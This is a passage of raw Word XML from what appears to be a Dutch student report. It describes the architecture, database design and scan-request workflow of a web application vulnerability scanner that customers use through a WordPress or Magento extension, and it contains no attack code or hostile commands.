                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008A0EF6">
        <w:t xml:space="preserve">Het subsysteem bestaat als enige uit meerdere lagen. De drie lagen zijn de service laag: service laag, logica laag en de data toegang laag. </w:t>
      </w:r>
      <w:r w:rsidR="00531AE8">
        <w:t>Ieder laag heeft een eigen rol binnen het sub systeem en zorgt ervoor dat de data goed wordt verwerkt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79608EB7" w14:textId="77777777" w:rsidR="006277D0" w:rsidRDefault="006277D0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00110CAA" w14:paraId="2FFC43A3" w14:textId="77777777" w:rsidTr="006457F7">
        <w:trPr>
          <w:trHeight w:val="279"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102B16B0" w14:textId="39CB24B8" w:rsidR="00110CAA" w:rsidRDefault="00110CAA">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60120FFD" w14:textId="414C68C8" w:rsidR="00110CAA" w:rsidRDefault="00110CAA">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00110CAA" w14:paraId="2866304D" w14:textId="77777777" w:rsidTr="006457F7">
        <w:trPr>
          <w:trHeight w:val="684"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBB9F2D" w14:textId="641B451C" w:rsidR="00110CAA" w:rsidRDefault="00696791">
            <w:r>
              <w:t>Service laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D66ED1" w14:textId="5A36AF79" w:rsidR="00110CAA" w:rsidRDefault="006457F7" w:rsidP="00B47461">
            <w:r>
              <w:t xml:space="preserve">Deze laag zorgt voor dat de data opgeslagen, geüpdatet en opgehaald kan worden. </w:t>
            </w:r>
            <w:r w:rsidR="00B47461">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="0027348D">
              <w:t xml:space="preserve">CRUD, </w:t>
            </w:r>
            <w:r w:rsidR="00B47461">
              <w:t>Glossary, 16</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00110CAA" w14:paraId="6EEDCBD6" w14:textId="77777777" w:rsidTr="006457F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7357D4C8" w14:textId="59794AE4" w:rsidR="00110CAA" w:rsidRDefault="00EF3B41">
            <w:r>
              <w:t>Logica laag</w:t>
            </w:r>
            <w:r w:rsidR="001E53FD">
              <w:t xml:space="preserve"> (controller)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8B028E" w14:textId="5454B832" w:rsidR="00110CAA" w:rsidRDefault="00335565">
            <w:r>
              <w:t>Deze laag maakt gebruik van de service laag om de data te verwerken.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00110CAA" w14:paraId="1D1B424C" w14:textId="77777777" w:rsidTr="006457F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B1D12C" w14:textId="1C6E5C46" w:rsidR="00110CAA" w:rsidRDefault="00EF3B41">
            <w:r>
              <w:t>Data toegang laag</w:t>
            </w:r>
            <w:r w:rsidR="001E53FD">
              <w:t xml:space="preserve"> (Model</w:t>
            </w:r>
            <w:r w:rsidR="00186ACB">
              <w:t>, ORM</w:t>
            </w:r>
            <w:r w:rsidR="001E53FD">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B24559" w14:textId="30CFF429" w:rsidR="00110CAA" w:rsidRDefault="00186ACB">
            <w:r>
              <w:t xml:space="preserve">Service laag maakt gebruik van deze laag om </w:t>
            </w:r>
            <w:r w:rsidR="008126EC">
              <w:t>toegang te verkrijgen naar de database doormiddel van een ORM (Glossary, 17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A8D3947" w14:textId="72A5F4B4" w:rsidR="00110CAA" w:rsidRDefault="0062106E">
      <w:r>
        <w:t>Tabel 4.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DC6AC" w14:textId="26266BC0" w:rsidR="00C8465B" w:rsidRDefault="004D0744">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CEF2F6" w14:textId="1F1D36E3" w:rsidR="004D0744" w:rsidRPr="004D0744" w:rsidRDefault="00431889">
      <w:r>
        <w:t>De database is de vierde en laatste van de essentiële componenten</w:t>
      </w:r>
      <w:r w:rsidR="00D43C0E">
        <w:t>. Selectieve data</w:t>
      </w:r>
      <w:r w:rsidR="00B0769A">
        <w:t xml:space="preserve"> dat de Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00D43C0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30D12">
        <w:t xml:space="preserve">genereerd wordt opgeslagen in de database. </w:t>
      </w:r>
      <w:r w:rsidR="00B65305">
        <w:t>De</w:t>
      </w:r>
      <w:r w:rsidR="00843F5C">
        <w:t xml:space="preserve"> datastructuur is gebaseerd op mijn vooronderzoek naar de datastructuren die OWASP ZAP en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00843F5C">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00843F5C">
        <w:t xml:space="preserve"> hanteren.</w:t>
      </w:r>
      <w:r w:rsidR="00973414">
        <w:t xml:space="preserve"> (H 3.4.6)</w:t>
      </w:r>
      <w:r w:rsidR="00B0769A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A01582">
        <w:t>Het tabel aanmeldingen</w:t>
      </w:r>
      <w:r w:rsidR="00C14DED">
        <w:t xml:space="preserve"> ()</w:t>
      </w:r>
      <w:r w:rsidR="00A01582">
        <w:t xml:space="preserve"> staat los van de rest, hierin worden alle aanmeldingen opgeslagen en vanuit hier </w:t>
      </w:r>
      <w:r w:rsidR="00D372D9">
        <w:t>worden de authentieke klanten geselecteerd en overgeplaatst naar de klanten tabel.</w:t>
      </w:r>
      <w:r w:rsidR="004541F9">
        <w:t xml:space="preserve"> De overplaatsing gebeurt zodra de administrator de aanmelding op actief zet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F438A" w14:textId="228A2539" w:rsidR="00AA6F1E" w:rsidRDefault="00D372D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251957248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EA7F8B5" wp14:editId="3B055737">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>114935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3568700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760720" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="198" name="Text Box 198"/>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6EBA8179" w14:textId="0E2EA765" w:rsidR="00CE4BB5" w:rsidRPr="00D542F1" w:rsidRDefault="00CE4BB5" w:rsidP="00466E3B">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.3 vergrote diagram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7F8B5" id="Text Box 198" o:spid="_x0000_s1060" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:9.05pt;margin-top:281pt;width:453.6pt;height:21.25pt;z-index:25195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Y+PzgCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EkAotIlSMimkSaivB&#10;1GfjOCSS7fPOhqT79Ts7Cd26PU17Mee7z3e577tjed8azS4KfQ0255PRmDNlJRS1PeX822H76ZYz&#10;H4QthAarcv6qPL9fffywbNxCTaECXShklMT6ReNyXoXgFlnmZaWM8CNwylKwBDQi0BVPWYGioexG&#10;Z9PxeJY1gIVDkMp78j50Qb5K+ctSyfBUll4FpnNO3xbSiek8xjNbLcXihMJVtew/Q/zDVxhRWyp6&#10;TfUggmBnrP9IZWqJ4KEMIwkmg7KspUo9UDeT8btu9pVwKvVC5Hh3pcn/v7Ty8fKMrC5IuzuSygpD&#10;Ih1UG9hnaFn0EUON8wsC7h1BQ0sBQg9+T87YeFuiib/UEqM4cf165Temk+S8mc/G8ymFJMWms7vb&#10;+U1Mk729dujDFwWGRSPnSPolWsVl50MHHSCxmAddF9ta63iJgY1GdhGkdVPVQfXJf0NpG7EW4qsu&#10;YedRaVj6KrHhrrFohfbYJoqm86HrIxSvRAZCN1DeyW1N5XfCh2eBNEHUJG1FeKKj1NDkHHqLswrw&#10;x9/8EU/CUpSzhiYy5/77WaDiTH+1JHkc38HAwTgOhj2bDVDjE9o3J5NJDzDowSwRzAstyzpWoZCw&#10;kmrlPAzmJnR7Qcsm1XqdQDSkToSd3TsZUw80H9oXga4XKZC8jzDMqli806rDJrXc+hyI+CRkJLZj&#10;kQYgXmjA0yj0yxg36Nd7Qr39Zax+AgAA//8DAFBLAwQUAAYACAAAACEAxQB0muEAAAAKAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPMU/DMBCFdyT+g3VILIg6TZOohDhVVcEAS0XowubGbhyIz5HttOHf&#10;c0wwPt2nd9+rNrMd2Fn70DsUsFwkwDS2TvXYCTi8P9+vgYUoUcnBoRbwrQNs6uurSpbKXfBNn5vY&#10;MSrBUEoBJsax5Dy0RlsZFm7USLeT81ZGir7jyssLlduBp0lScCt7pA9GjnpndPvVTFbAPvvYm7vp&#10;9PS6zVb+5TDtis+uEeL2Zt4+Aot6jn8w/OqTOtTkdHQTqsAGyuslkQLyIqVNBDyk+QrYUUCRZDnw&#10;uuL/J9Q/AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMJWPj84AgAAegQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMUAdJrhAAAACgEAAA8AAAAA&#10;AAAAAAAAAAAAkAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6EBA8179" w14:textId="0E2EA765" w:rsidR="00CE4BB5" w:rsidRPr="00D542F1" w:rsidRDefault="00CE4BB5" w:rsidP="00466E3B">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.3 vergrote diagram bijlage B</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A01582">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251958272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11B0E825" wp14:editId="454B58DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4367530</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2828290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1278255" cy="1372235"/>
            <wp:effectExtent l="0" t="0" r="0" b="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aanmelden.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1278255" cy="1372235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A01582">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251955200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CD37D54" wp14:editId="0547FEB2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>175260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4822190" cy="3312795"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTopAndBottom/>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datamodel architecture.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4822190" cy="3312795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="234EE664" w14:textId="7F32A35A" w:rsidR="00AA6F1E" w:rsidRDefault="00A01582">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251960320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30D6D884" wp14:editId="496BD563">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4375150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4010025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1278255" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="203" name="Text Box 203"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1278255" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="09757034" w14:textId="063C9DFD" w:rsidR="00CE4BB5" w:rsidRPr="00B95E9A" w:rsidRDefault="00CE4BB5" w:rsidP="00B7673C">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.4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D6D884" id="Text Box 203" o:spid="_x0000_s1061" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.5pt;margin-top:315.75pt;width:100.65pt;height:21.25pt;z-index:25196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EDxDkCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFTBbtswDL0P2D8Iui9OPKTNjDhFliLDgKIt&#10;kAw9K7IcC5BETVJiZ18/SrbTrdtp2EWhSOrRfI/M8q7TipyF8xJMSWeTKSXCcKikOZb02377YUGJ&#10;D8xUTIERJb0IT+9W798tW1uIHBpQlXAEQYwvWlvSJgRbZJnnjdDMT8AKg8EanGYBr+6YVY61iK5V&#10;lk+nN1kLrrIOuPAevfd9kK4Sfl0LHp7q2otAVEnx20I6XToP8cxWS1YcHbON5MNnsH/4Cs2kwaJX&#10;qHsWGDk5+QeUltyBhzpMOOgM6lpykXrAbmbTN93sGmZF6gXJ8fZKk/9/sPzx/OyIrEqaTz9SYphG&#10;kfaiC+QzdCT6kKHW+gITdxZTQ4cBVHr0e3TGxrva6fiLLRGMI9eXK78RjsdH+e0in88p4RjLbz4t&#10;bucRJnt9bZ0PXwRoEo2SOtQv0crODz70qWNKLOZByWorlYqXGNgoR84MtW4bGcQA/luWMjHXQHzV&#10;A/YekYZlqBIb7huLVugOXU/RYuz6ANUFyXDQD5S3fCux/APz4Zk5nCDsH7ciPOFRK2hLCoNFSQPu&#10;x9/8MR+FxSglLU5kSf33E3OCEvXVoORxfEfDjcZhNMxJbwAbn+G+WZ5MfOCCGs3agX7BZVnHKhhi&#10;hmOtkobR3IR+L3DZuFivUxIOqWXhwewsj9AjzfvuhTk7iBRQ3kcYZ5UVb7Tqc5Nadn0KSHwSMhLb&#10;s4gDEC844GkUhmWMG/TrPWW9/mWsfgIAAP//AwBQSwMEFAAGAAgAAAAhAMxD9UfiAAAACwEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMjzFPwzAQhXck/oN1SCyIOiUhLSFOVVUw0KUi7cLmxm4ciM+R7bTh&#10;33NMsN29e3r3vXI12Z6dtQ+dQwHzWQJMY+NUh62Aw/71fgksRIlK9g61gG8dYFVdX5WyUO6C7/pc&#10;x5ZRCIZCCjAxDgXnoTHayjBzg0a6nZy3MtLqW668vFC47flDkuTcyg7pg5GD3hjdfNWjFbDLPnbm&#10;bjy9bNdZ6t8O4yb/bGshbm+m9TOwqKf4Z4ZffEKHipiObkQVWC8gXz5Rl0hDOn8ERg4SUmBHUhZZ&#10;Arwq+f8O1Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAaXEDxDkCAAB6BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAzEP1R+IAAAALAQAADwAA&#10;AAAAAAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="09757034" w14:textId="063C9DFD" w:rsidR="00CE4BB5" w:rsidRPr="00B95E9A" w:rsidRDefault="00CE4BB5" w:rsidP="00B7673C">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E95B7A" w14:textId="62F22998" w:rsidR="00AA6F1E" w:rsidRDefault="00AA6F1E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2767264C" w14:textId="4C0564ED" w:rsidR="00AA6F1E" w:rsidRDefault="00AA6F1E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CB15B2" w14:textId="51A2685B" w:rsidR="006347E6" w:rsidRDefault="006347E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61DEBF" w14:textId="1D3DCC15" w:rsidR="007A6BF3" w:rsidRPr="001E1D12" w:rsidRDefault="00CA0E26">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1D12">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Workflow van het systeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72340AB7" w14:textId="7A7A21B5" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="003918A9">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D724759" wp14:editId="542807FC">
            <wp:extent cx="5760720" cy="3220085"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="4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 web scanner systeem.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220085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C0012" w14:textId="381EA710" w:rsidR="003918A9" w:rsidRDefault="00E8068A" w:rsidP="003918A9">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB9A78" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="003918A9"/>
    <w:p w14:paraId="2186DA53" w14:textId="77777777" w:rsidR="00357E59" w:rsidRDefault="00357E59" w:rsidP="003918A9"/>
    <w:p w14:paraId="23919E99" w14:textId="33BB8BD8" w:rsidR="003918A9" w:rsidRDefault="00845D3B" w:rsidP="003918A9">
      <w:r>
        <w:t>In diagram figuur 4.1</w:t>
      </w:r>
      <w:r w:rsidR="003918A9">
        <w:t xml:space="preserve">.1 zie je het hele proces die voor het scannen van een website op een versimpelde manier. Het begint bij de klant en eindigt bij de klant. Het is vanaf het verzenden van het formulier volledig geautomatiseerd, de klant hoeft enkel te wachten op een e-mail met het resultaat van de scan. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E257C" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="003918A9">
      <w:r>
        <w:t>Voorwaarden voor het starten van een scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1670BE9F" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De klant heeft toegang tot het CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908D914" w14:textId="704B943C" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De klant installeert de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extensie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82C0F4" w14:textId="77777777" w:rsidR="00A270AF" w:rsidRDefault="00A270AF" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137CC410" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="003918A9">
      <w:r>
        <w:t>Proces in stappen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A590E" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De klant vult het aanvraagformulier met als input: URL van website, Naam van klant en e-mailadres van klant en type scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B72D40" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
